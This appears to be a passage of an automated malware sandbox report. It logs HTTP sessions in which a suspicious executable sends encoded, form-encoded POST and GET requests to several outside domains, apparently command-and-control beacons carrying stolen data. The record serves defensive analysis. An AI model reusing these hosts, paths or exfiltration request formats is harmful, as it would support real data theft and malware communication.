                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.6587773.33.130.190802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:16.938992977 CEST502OUTGET /chjf/?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzO HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.8zu934.vip
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:17.405038118 CEST412INHTTP/1.1 200 OK
                                                                                      Server: openresty
                                                                                      Date: Mon, 30 Sep 2024 08:42:17 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 272
                                                                                      Connection: close
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 6a 74 50 4b 58 3d 58 41 47 44 50 62 32 68 59 53 4e 41 31 47 32 30 35 42 39 79 54 55 47 6e 41 58 38 64 4f 2b 37 7a 42 31 63 4c 56 48 63 6b 78 4a 6f 35 61 68 55 2f 61 41 53 6f 76 4f 2f 6b 6c 38 36 4b 4b 32 74 33 42 51 39 52 44 37 6e 77 72 6f 6a 58 46 6d 62 78 47 31 39 68 2b 50 48 78 33 50 65 42 34 35 71 5a 58 4b 41 2f 57 73 69 49 4f 31 52 63 4f 59 37 39 50 75 70 6b 53 4b 6a 6a 6a 35 67 32 2f 2b 7a 32 5a 76 72 6c 7a 4c 73 3d 26 59 44 54 34 50 3d 34 78 64 38 44 7a 4f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9jtPKX=XAGDPb2hYSNA1G205B9yTUGnAX8dO+7zB1cLVHckxJo5ahU/aASovO/kl86KK2t3BQ9RD7nwrojXFmbxG19h+PHx3PeB45qZXKA/WsiIO1RcOY79PupkSKjjj5g2/+z2ZvrlzLs=&YDT4P=4xd8DzO"}</script></head></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.658779203.161.41.205802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:22.466061115 CEST760OUTPOST /pzb3/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Origin: http://www.tophfy.info
                                                                                      Referer: http://www.tophfy.info/pzb3/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 52 45 59 57 64 47 62 76 73 6e 71 71 39 48 46 6f 67 55 51 6c 6d 35 63 52 4c 57 65 52 73 48 44 36 69 62 46 50 69 71 52 55 71 38 5a 72 41 44 4f 36 73 6e 37 69 4c 4a 68 53 5a 56 73 64 31 67 4f 57 54 4e 74 6e 67 78 5a 6d 42 6e 49 57 71 4e 42 65 56 56 46 6b 63 4f 6e 66 42 5a 6f 41 45 42 59 4f 30 65 69 45 41 77 56 6c 6a 64 4a 4a 53 66 34 49 57 4e 6b 64 67 32 69 39 4a 55 50 57 66 6c 73 59 45 36 47 70 76 79 56 30 77 61 4f 41 34 35 47 69 62 39 59 70 42 42 43 6f 6b 6d 4b 47 55 73 50 4a 30 54 30 63 64 63 39 5a 74 44 49 4c 5a 2b 4e 6b 6e 33 74 2b 50 66 76 6c 2f 2f 4d 74 61 63 4b 78 64 57 48 6f 6c 56 68 49 42 2f 73 67
                                                                                      Data Ascii: 9jtPKX=REYWdGbvsnqq9HFogUQlm5cRLWeRsHD6ibFPiqRUq8ZrADO6sn7iLJhSZVsd1gOWTNtngxZmBnIWqNBeVVFkcOnfBZoAEBYO0eiEAwVljdJJSf4IWNkdg2i9JUPWflsYE6GpvyV0waOA45Gib9YpBBCokmKGUsPJ0T0cdc9ZtDILZ+Nkn3t+Pfvl//MtacKxdWHolVhIB/sg
                                                                                      Sep 30, 2024 10:42:23.054466963 CEST595INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:22 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.658780203.161.41.205802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:25.035911083 CEST784OUTPOST /pzb3/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Origin: http://www.tophfy.info
                                                                                      Referer: http://www.tophfy.info/pzb3/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 235
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 52 45 59 57 64 47 62 76 73 6e 71 71 38 6d 31 6f 6d 33 34 6c 68 5a 63 51 56 6d 65 52 6d 6e 44 2b 69 62 42 50 69 72 46 45 71 4a 78 72 44 69 2b 36 2b 32 37 69 48 70 68 53 42 46 73 45 71 77 4f 66 54 4e 52 76 67 77 4a 6d 42 6e 30 57 71 4d 78 65 56 69 70 6e 64 65 6e 5a 4c 4a 6f 47 41 42 59 4f 30 65 69 45 41 77 52 4c 6a 64 52 4a 53 72 45 49 58 73 6b 61 6a 32 69 2b 4d 6b 50 57 4a 6c 73 63 45 36 48 36 76 7a 59 68 77 59 32 41 34 34 32 69 62 76 77 71 50 42 43 6d 71 47 4c 31 45 39 36 56 74 67 4e 35 44 63 70 6c 35 43 63 4d 52 6f 4d 2b 37 45 74 64 64 50 50 6e 2f 39 55 66 61 38 4b 62 66 57 2f 6f 33 43 74 76 4f 4c 4a 44 79 61 76 61 43 38 38 70 64 69 6f 53 6b 41 38 6a 79 77 74 50 62 41 3d 3d
                                                                                      Data Ascii: 9jtPKX=REYWdGbvsnqq8m1om34lhZcQVmeRmnD+ibBPirFEqJxrDi+6+27iHphSBFsEqwOfTNRvgwJmBn0WqMxeVipndenZLJoGABYO0eiEAwRLjdRJSrEIXskaj2i+MkPWJlscE6H6vzYhwY2A442ibvwqPBCmqGL1E96VtgN5Dcpl5CcMRoM+7EtddPPn/9Ufa8KbfW/o3CtvOLJDyavaC88pdioSkA8jywtPbA==
                                                                                      Sep 30, 2024 10:42:25.636146069 CEST595INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:25 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.658781203.161.41.205802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:27.583364964 CEST1797OUTPOST /pzb3/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Origin: http://www.tophfy.info
                                                                                      Referer: http://www.tophfy.info/pzb3/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 1247
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 52 45 59 57 64 47 62 76 73 6e 71 71 38 6d 31 6f 6d 33 34 6c 68 5a 63 51 56 6d 65 52 6d 6e 44 2b 69 62 42 50 69 72 46 45 71 50 70 72 41 51 32 36 73 42 50 69 47 70 68 53 4e 6c 73 5a 71 77 50 66 54 4e 35 72 67 77 46 63 42 68 34 57 70 76 35 65 54 58 64 6e 58 65 6e 5a 46 5a 6f 48 45 42 5a 61 30 65 79 2b 41 77 42 4c 6a 64 52 4a 53 71 55 49 65 64 6b 61 6c 32 69 39 4a 55 50 61 66 6c 73 30 45 36 65 50 76 7a 64 61 77 70 57 41 34 59 6d 69 64 63 59 71 44 42 43 6b 70 47 4c 74 45 39 6d 38 74 67 42 54 44 66 31 50 35 41 41 4d 41 50 78 4b 72 46 31 46 63 4d 6e 63 38 73 6f 68 53 37 4f 4f 51 6c 79 57 33 44 4a 6d 45 5a 52 39 78 74 58 6c 57 64 70 70 54 7a 70 2f 67 51 4a 73 78 42 45 63 42 64 52 70 34 41 36 74 4e 50 49 55 37 57 76 52 47 50 67 73 6a 51 65 4b 67 33 41 46 32 4b 32 6a 67 6c 46 41 2b 73 76 54 6c 33 6f 6d 35 38 6f 49 6b 62 35 4f 6e 63 41 58 78 42 33 49 55 58 73 4f 58 33 4a 4e 78 58 50 52 41 68 55 42 33 44 52 64 6c 56 35 65 43 4c 34 50 61 6b 37 72 30 6f 53 77 46 56 69 68 4b 50 51 79 5a 32 31 [TRUNCATED]
                                                                                      Data Ascii: 9jtPKX=REYWdGbvsnqq8m1om34lhZcQVmeRmnD+ibBPirFEqPprAQ26sBPiGphSNlsZqwPfTN5rgwFcBh4Wpv5eTXdnXenZFZoHEBZa0ey+AwBLjdRJSqUIedkal2i9JUPafls0E6ePvzdawpWA4YmidcYqDBCkpGLtE9m8tgBTDf1P5AAMAPxKrF1FcMnc8sohS7OOQlyW3DJmEZR9xtXlWdppTzp/gQJsxBEcBdRp4A6tNPIU7WvRGPgsjQeKg3AF2K2jglFA+svTl3om58oIkb5OncAXxB3IUXsOX3JNxXPRAhUB3DRdlV5eCL4Pak7r0oSwFVihKPQyZ21Jtx7agxbhrfNEpOpNukS9kLHEuxGESDJj0sMh2UEC4poqRm17g52nGpYBriBIz/uav86Xsg8NbJmmTCgOWrFN5EfEOeMj/fozpikACL4463suLqOnaDRTqv+iAHEgSDF1c+HARllQuCtzEbIN05oQ3EbeJSCDUFgVD27HgLRJgOEwiMkhL5Nykdr7anQlyMmKx8eW2EJyvXxTCX8HiaR4kA1GzhLsnzMZOdY67OrS2/AFRNYhQigKvxJOj6Qr/41Yi+05e6UZymtYzY9h9TbsLxX3NknYs4XyxPmaFj6LPB4ubrQP0qE5HrbvYNoTMpbI+WRHYSKne1p1FvVY8cDb9mvldgC0R9Ym4HN0ESp/DjKICwuBPjIuTlMhm6CXF8mXMbqPgDppyhjUaow55EfoMxzASM64DRa/tPxXC88kQth5rDVtPkKbNu0HptnbRzSihk4oI/F8zCcYZnAU9mcrhZrC+hi5obu4Ae4z4vSJtPLI5i5d/gInVarjUALniViwIyYa0zatybAYvGFwwjDVGM6jULB7C4RKyGq6uWEk7ZrZrsOGz6KAU4N86bhF/DqHZFKq9hH9BnY0KNqgKmJc2FaJplNOlLe2kT+WdvQgJAoCANNY2ckO1YoI7ikCnPZyJl5U0wIEuq79yQKTs/hmzvz5QO7RiCok+ [TRUNCATED]
                                                                                      Sep 30, 2024 10:42:28.158399105 CEST595INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:28 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      8192.168.2.658782203.161.41.205802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:30.125570059 CEST503OUTGET /pzb3/?YDT4P=4xd8DzO&9jtPKX=cGw2exDyh1KVkWsHkX4xj4lgVlPPukG30+Eeh6IH5uNyYRC1xGnnB8QFExEpiTL5bcBgsA98LG9yqfxBLyBILpDqP6cmLzlnqu2CIAVnl8NdZZMCWNNFkUmCCHKhOgovLr644XM= HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.tophfy.info
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Sep 30, 2024 10:42:30.704447031 CEST610INHTTP/1.1 404 Not Found
                                                                                      Date: Mon, 30 Sep 2024 08:42:30 GMT
                                                                                      Server: Apache
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      Content-Length: 389
                                                                                      X-XSS-Protection: 1; mode=block
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.65878365.21.196.90802360C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Sep 30, 2024 10:42:35.840297937 CEST766OUTPOST /zl45/ HTTP/1.1
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      Host: www.030002837.xyz
                                                                                      Origin: http://www.030002837.xyz
                                                                                      Referer: http://www.030002837.xyz/zl45/
                                                                                      Cache-Control: max-age=0
                                                                                      Connection: close
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Content-Length: 211
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
                                                                                      Data Raw: 39 6a 74 50 4b 58 3d 71 2b 41 33 50 2b 4c 53 74 6e 53 54 73 7a 47 51 41 75 6e 43 49 61 6e 41 75 61 4c 31 38 75 72 58 46 4b 2b 39 75 32 7a 68 36 67 70 4d 49 43 2f 4d 4f 67 6f 79 51 52 4c 30 6f 62 44 77 65 30 39 36 6a 67 2f 6b 64 6e 65 4e 50 41 63 64 68 4a 65 2f 69 77 69 52 33 76 49 32 34 43 61 67 54 6d 61 33 68 7a 2b 4d 43 77 71 66 4a 6f 44 51 57 78 32 39 74 75 37 53 66 5a 59 37 73 7a 30 51 67 76 35 36 49 54 63 4f 35 31 50 77 32 33 6b 44 62 73 6b 64 32 2b 6b 59 48 34 39 41 62 7a 52 57 38 37 43 49 6a 6e 48 43 44 6d 34 65 4f 54 49 52 4a 71 48 65 70 38 4e 43 6a 54 61 44 79 61 44 4f 41 6c 6a 6c 46 42 59 59 51 75 6f 59 2b 45 42 56
                                                                                      Data Ascii: 9jtPKX=q+A3P+LStnSTszGQAunCIanAuaL18urXFK+9u2zh6gpMIC/MOgoyQRL0obDwe096jg/kdneNPAcdhJe/iwiR3vI24CagTma3hz+MCwqfJoDQWx29tu7SfZY7sz0Qgv56ITcO51Pw23kDbskd2+kYH49AbzRW87CIjnHCDm4eOTIRJqHep8NCjTaDyaDOAljlFBYYQuoY+EBV
                                                                                      Sep 30, 2024 10:42:36.838613987 CEST1038INHTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:36 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 [TRUNCATED]
                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">302</h1><h2 style="margin-top:20px;font-size: 30px;">Found</h2><p>The document has been temporarily moved.</p></div></div></body></html>
                                                                                      Sep 30, 2024 10:42:36.839123964 CEST1038INHTTP/1.1 302 Found
                                                                                      Connection: close
                                                                                      content-type: text/html
                                                                                      content-length: 771
                                                                                      date: Mon, 30 Sep 2024 08:42:36 GMT
                                                                                      cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                      location: http://www.030002837.xyz/cgi-sys/suspendedpage.cgi
                                                                                      vary: User-Agent
